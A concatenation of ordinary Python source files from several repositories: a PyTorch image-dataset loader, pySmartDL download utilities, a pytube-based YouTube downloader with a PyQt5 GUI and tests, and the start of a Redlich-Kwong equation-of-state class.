index = np.random.RandomState(seed=56).permutation(len(self.df)) #np.random.permutation(len(self.df))
self.tailing = tailing[index,:]
self.feed = feed[index,:]
self.clip = clip[index]
#print(f'self.clip: {self.clip}')
transform = None
if transform is None:
normalize = torchvision.transforms.Normalize(mean=[0.5561, 0.5706, 0.5491],
std=[0.1833, 0.1916, 0.2061])
if train_mode == "train":
self.transforms = torchvision.transforms.Compose([
torchvision.transforms.RandomCrop(300),
torchvision.transforms.ToTensor(),
normalize])
else:
self.transforms = torchvision.transforms.Compose([
torchvision.transforms.CenterCrop(300),
torchvision.transforms.ToTensor(),
normalize])
transform_clip = None
if transform_clip is None:
normalize = torchvision.transforms.Normalize(mean=[0.5429, 0.5580, 0.5357],
std=[0.1841, 0.1923, 0.2079])
self.transform_clip = torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
normalize])
def denormalize4img(self, x_hat):
mean = [0.5561, 0.5706, 0.5491]
std = [0.1833, 0.1916, 0.2061]
mean = torch.tensor(mean).unsqueeze(1).unsqueeze(1)
std = torch.tensor(std).unsqueeze(1).unsqueeze(1)
x = x_hat * std + mean
return x
def __len__(self):
return len(self.clip)
def __getitem__(self, idx):
tailing = torch.tensor( self.tailing[idx,:], dtype=torch.float64 )
truth = torch.tensor( self.feed[idx,:], dtype=torch.float64 )
clip = self.clip[idx]
#print(f'clip: {clip}')
time_stamp = clip[:14]
#print('time_stamp_1: {}'.format(time_stamp))
if self.clip_mode == "single":
file_name = "{}_{}.jpg".format(time_stamp, random.randint(1,10))
full_img_path = os.path.join(self.root, clip, file_name)
images = Image.open(full_img_path).convert("RGB")
images = self.transforms(images)
else:
#print("==> Hello, I am here.")
img_list = torch.FloatTensor(3, 10, 400, 400) # [channels, frames, height, width]
for i in range(1, 11):
file_name = "{}_{}.jpg".format(time_stamp, i)
full_img_path = os.path.join(self.root, clip, file_name)
img = Image.open(full_img_path).convert("RGB")
img_list[:, i-1, :, :] = self.transform_clip(img).float()
top = np.random.randint(0, 100)
left = np.random.randint(0, 100)
images = img_list[:, :, top : top + 300, left : left + 300]
return tailing, images, truth
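# A minimal usage sketch (the root path, CSV file name and batch size are
# assumptions, not part of the original project):
#
#     dataset = XRFImg4FeedSet(root='data/clips', csv_file='XRFImgData4FeedRegression.csv',
#                              train_mode='train', clip_mode='single')
#     loader = torch.utils.data.DataLoader(dataset, batch_size=16, shuffle=True)
#     tailing, images, truth = next(iter(loader))   # tensors ready for the regressor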
``` |
{
"source": "jjisnow/pySmartDL",
"score": 3
} |
#### File: pySmartDL/pySmartDL/utils.py
```python
import os
import sys
import urllib.parse
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
import random
import logging
import re
from concurrent import futures # if python2, a backport is needed
from math import log
import shutil
def combine_files(parts, dest):
'''
Combines files.
:param parts: Source files.
:type parts: list of strings
:param dest: Destination file.
:type dest: string
'''
chunkSize = 1024 * 1024 * 4
if len(parts) == 1:
shutil.move(parts[0], dest)
else:
with open(dest, 'wb') as output:
for part in parts:
with open(part, 'rb') as input:
data = input.read(chunkSize)
while data:
output.write(data)
data = input.read(chunkSize)
os.remove(part)
def url_fix(s, charset='utf-8'):
'''
Sometimes you get an URL by a user that just isn't a real
URL because it contains unsafe characters like ' ' and so on. This
function can fix some of the problems in a similar way browsers
handle data entered by the user:
>>> url_fix(u'http://de.wikipedia.org/wiki/Elf (Begriffsklärung)')
'http://de.wikipedia.org/wiki/Elf%20%28Begriffskl%C3%A4rung%29'
:param s: Url address.
:type s: string
:param charset: The target charset for the URL if the url was
given as unicode string. Default is 'utf-8'.
:type charset: string
:rtype: string
(taken from `werkzeug.utils <http://werkzeug.pocoo.org/docs/utils/>`_)
'''
if sys.version_info < (3, 0) and isinstance(s, str):
s = s.encode(charset, 'ignore')
scheme, netloc, path, qs, anchor = urllib.parse.urlsplit(s)
path = urllib.parse.quote(path, '/%')
qs = urllib.parse.quote_plus(qs, ':&=')
return urllib.parse.urlunsplit((scheme, netloc, path, qs, anchor))
def progress_bar(progress, length=20):
'''
Returns a textual progress bar.
>>> progress_bar(0.6)
'[##########--------]'
:param progress: Number between 0 and 1 describes the progress.
:type progress: float
:param length: The length of the progress bar in chars. Default is 20.
:type length: int
:rtype: string
'''
length -= 2 # The brackets are 2 chars long.
if progress < 0:
progress = 0
if progress > 1:
progress = 1
return "[" + "#"*int(progress*length) + "-"*(length-int(progress*length)) + "]"
def is_HTTPRange_supported(url, timeout=15):
'''
Checks if a server allows `Byte serving <https://en.wikipedia.org/wiki/Byte_serving>`_,
using the Range HTTP request header and the Accept-Ranges and Content-Range HTTP response headers.
:param url: Url address.
:type url: string
:param timeout: Timeout in seconds. Default is 15.
:type timeout: int
:rtype: bool
'''
url = url.replace(' ', '%20')
fullsize = get_filesize(url)
if not fullsize:
return False
headers = {'Range': 'bytes=0-3'}
req = urllib.request.Request(url, headers=headers)
urlObj = urllib.request.urlopen(req, timeout=timeout)
filesize = int(urlObj.headers["Content-Length"])
urlObj.close()
return (filesize != fullsize)
def get_filesize(url, timeout=15):
'''
Fetches file's size of a file over HTTP.
:param url: Url address.
:type url: string
:param timeout: Timeout in seconds. Default is 15.
:type timeout: int
:returns: Size in bytes.
:rtype: int
'''
# url = url_fix(url)
try:
urlObj = urllib.request.urlopen(url, timeout=timeout)
except (urllib.error.HTTPError, urllib.error.URLError) as e:
return 0
try:
file_size = int(urlObj.headers["Content-Length"])
except (IndexError, KeyError, TypeError):
return 0
return file_size
def get_random_useragent():
'''
Returns a random popular user-agent.
Taken from `here <http://techblog.willshouse.com/2012/01/03/most-common-user-agents/>`_, last updated on 04/01/2017.
:returns: user-agent
:rtype: string
'''
l = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
]
return random.choice(l)
def sizeof_human(num):
'''
Human-readable formatting for filesizes. Taken from `here <http://stackoverflow.com/questions/1094841/reusable-library-to-get-human-readable-version-of-file-size>`_.
>>> sizeof_human(175799789)
'167.7 MB'
:param num: Size in bytes.
:type num: int
:rtype: string
'''
unit_list = list(zip(['B', 'kB', 'MB', 'GB', 'TB', 'PB'], [0, 0, 1, 2, 2, 2]))
if num > 1:
exponent = min(int(log(num, 1024)), len(unit_list) - 1)
quotient = float(num) / 1024**exponent
unit, num_decimals = unit_list[exponent]
        if sys.version_info >= (2, 7): # python2.7 supports comma separators
format_string = '{:,.%sf} {}' % (num_decimals)
return format_string.format(quotient, unit)
else: # with python2.6, we have to do some ugly hacks
if quotient != int(quotient): # real float
x, y = str(quotient).split('.')
                x = re.sub(r"(\d)(?=(\d{3})+(?!\d))", r"\1,", "%d" % int(x))
y = y[:num_decimals]
quotient = "%s.%s" % (x, y) if y else x
return "%s %s" % (quotient, unit)
else:
                quotient = re.sub(r"(\d)(?=(\d{3})+(?!\d))", r"\1,", "%d" % quotient)
return "%s %s" % (quotient, unit)
if num == 0:
return '0 bytes'
if num == 1:
return '1 byte'
def time_human(duration, fmt_short=False):
'''
Human-readable formatting for timing. Based on code from `here <http://stackoverflow.com/questions/6574329/how-can-i-produce-a-human-readable-difference-when-subtracting-two-unix-timestam>`_.
>>> time_human(175799789)
'6 years, 2 weeks, 4 days, 17 hours, 16 minutes, 29 seconds'
>>> time_human(589, fmt_short=True)
'9m49s'
:param duration: Duration in seconds.
:type duration: int
:param fmt_short: Format as a short string (`47s` instead of `47 seconds`)
:type fmt_short: bool
:rtype: string
'''
duration = int(duration)
if duration == 0:
return "0s" if fmt_short else "0 seconds"
INTERVALS = [1, 60, 3600, 86400, 604800, 2419200, 29030400]
if fmt_short:
        NAMES = ['s'*2, 'm'*2, 'h'*2, 'd'*2, 'w'*2, 'M'*2, 'y'*2]  # 'M' = months; keeps NAMES aligned with INTERVALS
else:
NAMES = [('second', 'seconds'),
('minute', 'minutes'),
('hour', 'hours'),
('day', 'days'),
('week', 'weeks'),
('month', 'months'),
('year', 'years')]
result = []
for i in range(len(NAMES)-1, -1, -1):
a = duration // INTERVALS[i]
if a > 0:
result.append( (a, NAMES[i][1 % a]) )
duration -= a * INTERVALS[i]
if fmt_short:
return "".join(["%s%s" % x for x in result])
return ", ".join(["%s %s" % x for x in result])
def create_debugging_logger():
'''
Creates a debugging logger that prints to console.
:rtype: `logging.Logger` instance
'''
t_log = logging.getLogger('pySmartDL')
t_log.setLevel(logging.DEBUG)
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
# console.setFormatter(logging.Formatter('[%(levelname)s@%(thread)d] %(message)s'))
console.setFormatter(logging.Formatter('[%(levelname)s] %(message)s'))
t_log.addHandler(console)
return t_log
class DummyLogger(object):
'''
A dummy logger. You can call `debug()`, `warning()`, etc on this object, and nothing will happen.
'''
def __init__(self):
pass
def dummy_func(self, *args, **kargs):
pass
def __getattr__(self, name):
if name.startswith('__'):
return object.__getattr__(name)
return self.dummy_func
class ManagedThreadPoolExecutor(futures.ThreadPoolExecutor):
'''
Managed Thread Pool Executor. A subclass of ThreadPoolExecutor.
'''
def __init__(self, max_workers):
futures.ThreadPoolExecutor.__init__(self, max_workers)
self._futures = []
def submit(self, fn, *args, **kwargs):
future = super(ManagedThreadPoolExecutor, self).submit(fn, *args, **kwargs)
self._futures.append(future)
return future
def done(self):
return all([x.done() for x in self._futures])
def get_exceptions(self):
l = []
for x in self._futures:
if x.exception():
l.append(x.exception())
return l
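# A minimal usage sketch (the URL list is an assumption; get_filesize is the
# helper defined earlier in this module):
#
#     pool = ManagedThreadPoolExecutor(max_workers=4)
#     for url in urls:
#         pool.submit(get_filesize, url)
#     while not pool.done():
#         pass                          # or sleep briefly between polls
#     errors = pool.get_exceptions()    # exceptions raised inside worker threads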
``` |
{
"source": "jjisnow/pytube",
"score": 3
} |
#### File: pytube/pytube/downloader_gui.py
```python
import os
from PyQt5 import QtGui
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import *
from pytube import downloader
class MagicWizard(QWizard):
def __init__(self, parent=None):
super(MagicWizard, self).__init__(parent)
self.addPage(url_page(self))
self.addPage(itag_page(self))
self.addPage(final_path_page(self))
self.setWindowTitle("Pytube GUI Downloader")
self.setWindowIcon(
QtGui.QIcon(
os.path.join("..", "images", "rooster.png")
))
# self.resize(640,480)
class url_page(QWizardPage):
def __init__(self, parent=None):
super(url_page, self).__init__(parent)
self.setTitle("Choose video link")
self.setSubTitle("Please input a URL to download")
layout = QVBoxLayout()
self.myTextBox = QLineEdit(self)
self.myTextBox.setAlignment(Qt.AlignLeft)
self.registerField("TextBox", self.myTextBox)
layout.addWidget(self.myTextBox)
self.setLayout(layout)
class itag_page(QWizardPage):
def __init__(self, parent=None):
super(itag_page, self).__init__(parent)
self.setTitle("Choose itag")
self.setSubTitle("Choose an itag corresponding to a video or audio stream")
layout = QVBoxLayout()
self.label1 = QLabel()
layout.addWidget(self.label1)
hbox = QHBoxLayout()
layout.addLayout(hbox)
self.label2 = QLabel()
hbox.addWidget(self.label2, alignment=Qt.AlignLeft)
self.itag_box = QLineEdit()
self.registerField("iTag*", self.itag_box)
hbox.addWidget(self.itag_box)
self.setLayout(layout)
def initializePage(self):
tb = self.field("TextBox")
self.label2.setText("itag: ")
itag_descr = downloader.downloader(tb, "--list")
font = self.label1.font()
self.label1.setFont(QtGui.QFont("Courier", 6, QtGui.QFont.Medium))
self.label1.setText(itag_descr)
class final_path_page(QWizardPage):
def __init__(self, parent=None):
super(final_path_page, self).__init__(parent)
layout = QVBoxLayout()
self.label1 = QLabel()
layout.addWidget(self.label1)
self.setLayout(layout)
def initializePage(self):
tb = self.field("TextBox")
itag = self.field("iTag")
final_path = downloader.downloader(tb, "--itag", itag, "-v")
self.label1.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.label1.setText(f"Final output file: \'{final_path}\'")
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
wizard = MagicWizard()
wizard.show()
sys.exit(app.exec_())
```
#### File: pytube/pytube/downloader.py
```python
import datetime
import math
import os
import shutil
import sys
from functools import wraps
from pprint import pformat
import time
import pysrt
from pytube import YouTube
import subprocess
from pathlib import Path
import logging
from docopt import docopt
from tabulate import tabulate
from typing import Union
def timing(fn):
'''Timing decorator for program - calculates runtime'''
@wraps(fn)
def wrap(*args, **kw):
time_start = time.time()
result = fn(*args, **kw)
time_end = time.time()
run_secs = time_end - time_start
date_secs = datetime.datetime.utcfromtimestamp(run_secs)
run_time = date_secs.time()
logging.info(f'function:{fn.__name__} args:[{args}, {kw}]')
logging.info(f' --- {run_time.isoformat(timespec="milliseconds")} secs --- ')
return result
return wrap
@timing
def downloader(*args: tuple):
''' main interface for downloader file
'''
arguments = parse_arguments(args)
config_loggers(arguments)
arguments = check_url(arguments)
check_requirements('aria2c', 'ffmpeg')
for file in arguments['URL']:
logging.debug(f"Parsing url: {file}")
yt = YouTube(file)
streams = yt.streams
stream_table = parse_streams(streams)
if arguments['--list']:
return stream_table
itag = get_itag(arguments)
target_stream = streams.get_by_itag(itag)
logging.info("DOWNLOADING:")
video_path, audio_path, subtitle_path, video_fps = [None] * 4
if not target_stream.includes_audio_track:
logging.info("downloading video first......")
video_path = download_file(target_stream,
args=arguments,
)
video_fps = target_stream.fps
logging.info("downloading audio as well!")
audio_target = streams.filter(only_audio=True).first()
audio_path = download_file(audio_target,
args=arguments,
)
else:
logging.info(f"downloading {target_stream.type} ONLY")
if target_stream.type == 'video':
video_path = download_file(target_stream,
args=arguments,
)
video_fps = target_stream.fps
elif target_stream.type == 'audio':
audio_target = target_stream
audio_path = download_file(audio_target,
args=arguments,
)
else:
logging.critical(
f"unexpected file type: {target_stream.type}")
return 1
# need to retime the captions if I'm to use them in shorter videos
if not target_stream.type == 'audio':
subtitle_path = download_captions(yt, lang=arguments['--lang'],
duration=arguments['--duration'],
start=arguments['--start'])
# In the event only audio, create HQ mp3 or aac file
if target_stream.type == 'audio':
if (audio_path.suffix == '.webm' and target_stream.audio_codec == 'opus') \
or (
audio_path.suffix == '.mp4' and 'mp4' in target_stream.audio_codec):
final_path = make_mp3(audio_path) # the default
# final_fp = make_aac(audio_path) # not supported by all platforms
# final_fp = make_ogg(audio_path) # not supported by all platforms
else:
final_path = mux_files(audio_path)
else:
final_path = mux_files(audio_path, video_path, subtitle_path, video_fps)
cleanup_files(audio_path, video_path, subtitle_path)
logging.info(f"Final output file: {final_path}")
return final_path
def parse_arguments(args: tuple) -> dict:
'''set arguments dictionary from supplied arguments'''
arguments = docopt(__doc__, argv=args, help=True)
if arguments['--verbose']:
log_level = logging.DEBUG
elif arguments['--quiet']:
log_level = logging.CRITICAL
else:
log_level = logging.INFO
arguments['log_level'] = log_level
return arguments
def config_loggers(args: dict) -> None:
""" displays the supplied arguments to stdout before switching back to
the stderr handler
:param args:
:param log_level:
:return:
"""
log_level = args['log_level']
logging.basicConfig(level=log_level)
logger = logging.getLogger()
# These lines are needed to create a stdout handler
# stdout_handler = logging.StreamHandler(stream=sys.stdout)
# stdout_handler.setLevel(log_level)
# logger.addHandler(stdout_handler)
#
# root_handler = logger.handlers[0]
# root_handler.setLevel(log_level)
# logger.removeHandler(root_handler)
logging.info(f"Supplied args: \n {args}")
# logger.removeHandler(stdout_handler)
# logger.addHandler(root_handler)
def check_url(args: dict) -> dict:
''' parse the url and obtain one if none provided
Use a provided link or the args provided
'''
while len(args['URL']) == 0:
link = input("Provide a youtube link to download: ")
args['URL'].append(link)
if args['URL'][0] == '':
print("a link must be supplied!")
del args['URL'][0]
logging.info(f"Final args: {args}")
return args
def check_requirements(*args) -> None:
'''ensure executables supplied exist on the file system'''
logging.debug(f'Requirements: {args}')
for arg in args:
status = shutil.which(f'{arg}')
if status is not None:
logging.debug(f'Requirement: {arg} met with {status}')
else:
logging.error(f'Requirement: {arg} not met! status: {status}')
raise Exception(f'Requirement: {arg} not met! status: {status}')
def parse_streams(streams) -> str:
'''
take yt.streams.all() and print it as a table for viewing
'''
final_list = []
for stream in streams:
stream = str(stream).strip('<>').replace('Stream: ', '').split(' ')
stream_dict = {}
for item in stream:
a = item.split('=')
k = a[0]
v = a[1].strip('"')
stream_dict[k] = v
final_list.append(stream_dict)
stream_table = tabulate(final_list, headers="keys")
print(stream_table)
return stream_table
def get_itag(args: dict) -> int:
while True:
if args['--itag']:
itag = args['--itag']
break
try:
itag = int(input("Which stream do you want? (specify itag): "))
break
except ValueError:
logging.error("you need to provide a number!")
return itag
def download_file(download_target, args: dict = (), ) -> Path:
'''download stream given a download_target (a stream object either audio or video,
captions are handled separately).
args['duration'] and args['start'] are used to specify time dimensions
Note that ffmpeg already has a HH:MM:SS.ms specification limited to 2 digits for
HH, MM and SS
'''
logging.debug(f"current directory: {Path.cwd()}")
logging.info(f"Downloading itag: {download_target.itag}")
logging.info(f"Download url: {download_target.url}")
download_path = Path(download_target.default_filename)
# set local defaults for arguments passed
args = dict(args)
duration = args.get('--duration', None)
start = args.get('--start', '0')
download_path = Path(f"{download_path.stem}-{download_target.type}{download_path.suffix}")
logging.debug(f"Targeting destination: {download_path}")
if duration:
# download the file with ffmpeg
# -ss : start point to download in HH:MM:SS.MILLISECONDS format if needed
# -t : duration to download in seconds
# -to: end point to download as above format. -t takes precedence
# NB: -ss before -i sets the -to origin to zero at the cut point
        # -copyts: allows -to to refer to the start of the clip, not the cut point.
# removed individual codec copy encode commands because keyframes need
# to match downloaded time.
logging.debug(f"attempting to download {duration} seconds of file")
cmd = (f'ffmpeg',
'-y',
'-ss', f'{start}',
'-i', f'{download_target.url}',
'-t', f'{duration}',
'-c', 'copy',
f'{download_path}')
else:
# download the entire file with aria
# -c : continue/resume downloads
# -j : number of parallel downloads for 1 link
# --optimize-concurrent-downloads=true: optimise speed
# -x : max connections per server
# -k : min split size
# -s, --split=N: Download using N connections
cmd = ('aria2c',
'--continue=true',
'-j5', '-x5',
'--optimize-concurrent-downloads=true',
'-k', '1M',
'--split=5',
'-o', f'{download_path}',
f'{download_target.url}')
logging.debug(f"Command to be run: {cmd}")
subprocess.run(cmd, shell=False, check=True)
logging.info(f"Final {download_target.type} file: {download_path}")
return download_path
def download_captions(yt: YouTube, lang: str = 'English',
duration: str = None, start: str = None) -> Union[Path, None]:
i = None
caption_list = list(yt.captions.lang_code_index.values())
captions = enumerate(caption_list)
    captions_string = pformat(caption_list)
logging.debug(f'captions available: {captions_string}')
for index, c in captions:
logging.debug(f'{index} index: {c} caption')
if lang in str(c):
i = index
logging.debug(f'found {lang} captions at index {i}')
break
if i is None:
logging.debug(f'No {lang} Captions found!')
return None
subt_base = Path(yt.fmt_streams[0].default_filename).stem
subt_fp = Path(f'{subt_base}-captions.srt')
if os.path.exists(subt_fp):
logging.info(f'File {subt_fp} exists already!! Deleting')
os.remove(subt_fp)
logging.debug(f'Writing {subt_fp}')
lines = yt.caption_tracks[i].generate_srt_captions()
subt_fp.write_text(lines, encoding='utf-8')
# retime the subtitles
if start or duration:
logging.info(f'retiming subtitles {subt_fp}')
subs = pysrt.open(subt_fp)
if start:
start = float(strp_time(start))
subs.shift(seconds=-math.trunc(start),
milliseconds=-math.trunc((start % 1) * 1000))
part = subs.slice(starts_after={'milliseconds': -1})
if duration:
duration = float(strp_time(duration))
part = part.slice(ends_before={'seconds' : math.trunc(duration),
'milliseconds': math.trunc(
(duration % 1) * 1000)})
if len(part) < 1:
logging.info(f'No valid subtitles left, removing {subt_fp} file')
os.remove(subt_fp)
return None
part.save(subt_fp)
return subt_fp
def strp_time(time_str: str) -> str:
''' returns corrected number of seconds given a variation of HH:MM:SS.milliseconds string'''
if ':' not in time_str:
return time_str
else:
secs = 0
time_parts = time_str.split(':')
for i, n in enumerate(reversed(time_parts)):
secs += 60 ** i * float(n)
return str(secs)
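# Examples for strp_time (derived from the logic above): '45' -> '45' (unchanged),
# '1:30' -> '90.0', '01:02:03.5' -> '3723.5'.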
def mux_files(audio_path: Path, video_path: Path = None,
subt_path: Path = None, video_fps: str = None) -> Path:
'''mux file streams supplied'''
logging.info("attempting to mix audio and video")
# -y: global ie overwrite without asking
# -i: input file
# -r: set frame rate in fps
# -filter:a create filtergraph
# -c:a copy means copy audio streams
# -c:v copy means copy video stream codec
# -c:s srt means copy subtitles as srt
# -filter:a aresample=async=1 means resample audio to fit frame rates
if video_path:
# removes "-video" from name end
if video_path.stem.endswith('-video'):
final_path = Path(video_path.stem[:-6]).with_suffix(video_path.suffix)
elif audio_path:
# leaves "-audio" on end for only audio files
final_path = audio_path
    else:
        logging.error("no audio or video file path supplied")
        raise ValueError("no audio or video file path supplied")
# Using '.mkv' to handle subtitles for time being
final_path = Path(f'{final_path.stem}-output.mkv')
audio_path_text = ('-i', f'{audio_path}') if audio_path else ()
video_path_text = ('-i', f'{video_path}') if video_path else ()
subt_path = () if subt_path is None else ('-i', f'{subt_path}')
subt_extension = ('-c:s', 'srt') if subt_path else ()
video_fps_text = ('-r', f'{video_fps}') if video_fps else ()
if final_path.is_file():
logging.error(f"{final_path} already exists! Will overwrite...")
cmd = ('ffmpeg',
'-y',
*audio_path_text,
*video_path_text,
*subt_path,
*video_fps_text,
'-c:a', 'copy',
'-c:v', 'copy',
*subt_extension,
f'{final_path}')
logging.debug(f"Command to be run: {cmd}")
subprocess.run(cmd, shell=False, check=True)
logging.info(f"Final muxed file: {final_path}")
return final_path
def cleanup_files(audio_path: Path = None, video_path: Path = None, subtitle_path: Path = None, ) -> None:
'''cleanup file paths supplied'''
logging.info("CLEANUP:")
for k, v in {'audio' : audio_path,
'video' : video_path,
'subtitles': subtitle_path}.items():
if v:
logging.info(f"CLEANUP: deleting {k} file: {v}")
# check for errors
errors = os.remove(v)
if not errors:
logging.info("Success!")
else:
logging.error(f"Error code detected: {errors}")
else:
logging.debug(f'CLEANUP: no {k} file detected')
def check_audio_path(audio_path, suffix='.mp3'):
logging.debug(f"current directory: {Path.cwd()}")
fp = audio_path.with_suffix(suffix)
logging.debug(f"Targeting destination: {fp}")
if fp.is_file():
logging.error(f"{fp} already exists! Will overwrite...")
return fp
def make_mp3(audio_path: Path) -> Path:
'''convert from a webm file to an mp3'''
fp = check_audio_path(audio_path, suffix='.mp3')
# convert the file
# -i : input file name
# -c:a libmp3lame : create mp3 file using lame codec
# -q:a 0 : highest variable audio quality
# -n : exit immediately if file exists
# -y : overwrite output files without asking
cmd = ('ffmpeg',
'-y',
'-i', f'{audio_path}',
'-c:a', 'libmp3lame',
'-q:a', '0',
f'{fp}')
logging.debug(f"Command to be run: {cmd}")
subprocess.run(cmd, shell=False, check=True)
return fp
def make_ogg(audio_path: Path) -> Path:
'''convert from a webm file to an ogg'''
fp = check_audio_path(audio_path, suffix='.ogg')
# convert the webm -> ogg
# -c:a copy : use the same audio codec
# -n : exit immediately if file exists
# -y : overwrite output files without asking
cmd = ('ffmpeg',
'-y',
'-i', f'{audio_path}',
'-c:a', 'libopus',
'-b:a', '160k',
f'{fp}')
logging.debug(f"Command to be run: {cmd}")
subprocess.run(cmd, shell=False, check=True)
return fp
def make_aac(audio_path: Path) -> Path:
'''convert from a file to an aac'''
fp = check_audio_path(audio_path, suffix='.aac')
# convert the file
# -i : input file name
# -c:a aac : create aac file
# -q:a 0 : highest variable audio quality
# -profile:a aac_ltp : Long term prediction profile, is enabled by and will enable
# the aac_ltp option. Introduced in MPEG4.
# -n : exit immediately if file exists
# -y : overwrite output files without asking
cmd = ('ffmpeg',
'-y',
'-i', f'{audio_path}',
'-c:a', 'aac',
'-q:a', '0',
'-profile:a', 'aac_main',
f'{fp}')
logging.debug(f"Command to be run: {cmd}")
subprocess.run(cmd, shell=False, check=True)
return fp
if __name__ == '__main__':
downloader(*sys.argv[1:])
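# Example invocations (the full docopt usage string lives in the module
# docstring, which is not shown here; the flags below are the ones referenced
# in this file and in downloader_gui.py):
#
#     python downloader.py https://www.youtube.com/watch?v=... --list
#     python downloader.py https://www.youtube.com/watch?v=... --itag 22 -v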
```
#### File: pytube/tests/test_downloader.py
```python
import math
import os
import subprocess
from pathlib import Path
import pytest
from pytube import downloader
@pytest.fixture()
def base_command():
return ' '.join((
"python",
os.path.join("..", "pytube", "downloader.py"),
"-v",
))
@pytest.fixture
def wildlife_clip(base_command):
# uses a short 30s wildlife clip
url = "https://www.youtube.com/watch?v=5DP5I8Gd6wY"
command = " ".join((base_command,
url,
))
return command
@pytest.fixture
def calm_owl_clip(base_command):
# 6 second calm owl clip
url = "https://www.youtube.com/watch?v=FBgLytbB-uE"
command = " ".join((base_command,
url,
))
return command
@pytest.fixture
def captions(base_command):
# youtube close caption demo
url = "https://www.youtube.com/watch?v=QRS8MkLhQmM"
command = " ".join((base_command,
url,
))
return command
def check_expected(base_command, downloaded_expected, itag, size_expected):
if downloaded_expected.is_file():
os.remove(downloaded_expected)
cmd = base_command + f" -i {str(itag)} -d 1"
subprocess.run(cmd, shell=False)
if all((downloaded_expected.is_file(),
math.isclose(downloaded_expected.stat().st_size, size_expected,
rel_tol=0.01))):
os.remove(downloaded_expected)
assert True
else:
        print(f'Size not correct. Expected {size_expected}, '
              f'Got {downloaded_expected.stat().st_size}')
assert False
@pytest.mark.parametrize("args, expected", [
(('aria2c', 'ffmpeg', 'ffprobe'), None)
])
def test_downloader_check_requirements(args, expected):
assert downloader.check_requirements(*args) == None
@pytest.mark.parametrize("args", [
('blah_not_executable',)
])
def test_downloader_check_requirements_bad(args):
with pytest.raises(Exception):
downloader.check_requirements(args)
def test_list(wildlife_clip):
assert subprocess.run(wildlife_clip + " -l", shell=False)
def test_audio(wildlife_clip):
# test for audio file only
downloaded_expected = Path(
"Short wildlife video clip HD-audio.mp3")
itag = 249
size_expected = 27117
check_expected(wildlife_clip, downloaded_expected, itag, size_expected)
# def test_combined(wildlife_clip):
# # test for low quality video file download
# downloaded_expected = Path("Short wildlife video clip HD-output.mkv")
# itag = 278
# size_expected = 37274
# check_expected(wildlife_clip, downloaded_expected, itag, size_expected)
def test_hq_combined(calm_owl_clip):
# test for high quality combined video file
downloaded_expected = Path("Calm Owl-output.mkv")
itag = 22
size_expected = 161909
check_expected(calm_owl_clip, downloaded_expected, itag, size_expected)
# def test_audio_captions(captions):
# # test for audio file only
# base_command = captions
# downloaded_expected = Path(
# "YouTube Captions and Subtitles-audio.mp3")
# itag = 249
# size_expected = 4365
# check_expected(base_command, downloaded_expected, itag, size_expected)
# def test_combined_captions(captions):
# # test for low quality video file muxing
# base_command = captions
# downloaded_expected = Path("YouTube Captions and Subtitles-output.mkv")
# itag = 278
# size_expected = 21955
# check_expected(base_command, downloaded_expected, itag, size_expected)
def test_hq_mux(captions):
# test for high quality combined video file
base_command = captions
downloaded_expected = Path("YouTube Captions and Subtitles-output.mkv")
itag = 243
size_expected = 25147
check_expected(base_command, downloaded_expected, itag, size_expected)
def test_non_safe_file_title(base_command):
url = "https://www.youtube.com/watch?v=BpaYqFd5S5c"
base_command = " ".join((base_command,
url,
))
itag = 278
cmd = base_command + f" -i {str(itag)} -d 1"
downloaded_expected = Path(
'Adam Savages New One Day Builds T-Shirt!-output.mkv')
if downloaded_expected.is_file():
os.remove(downloaded_expected)
exit_code = subprocess.run(cmd, shell=False)
os.remove(downloaded_expected)
assert exit_code.returncode == 0
``` |
{
"source": "j-jith/equations-of-state",
"score": 3
} |
#### File: equations-of-state/pythermophy/cubic_eos.py
```python
from __future__ import print_function, division
import numpy as np
from .cubic_parent import CubicEOS
class RedlichKwong(CubicEOS):
"""
Redlich-Kwong equation of state.
For details see https://www.e-education.psu.edu/png520/m10_p4.html
:param fluid: a :class:`~pythermophy.fluid.Fluid` instance
:return: an :class:`~pythermophy.parent_class.EOS` instance
"""
def __init__(self, fluid):
self.p_crit = fluid.p_crit # Pa
self.T_crit = fluid.T_crit # K
self.a0 = 0.42748 * self.R**2 * self.T_crit**2 / self.p_crit
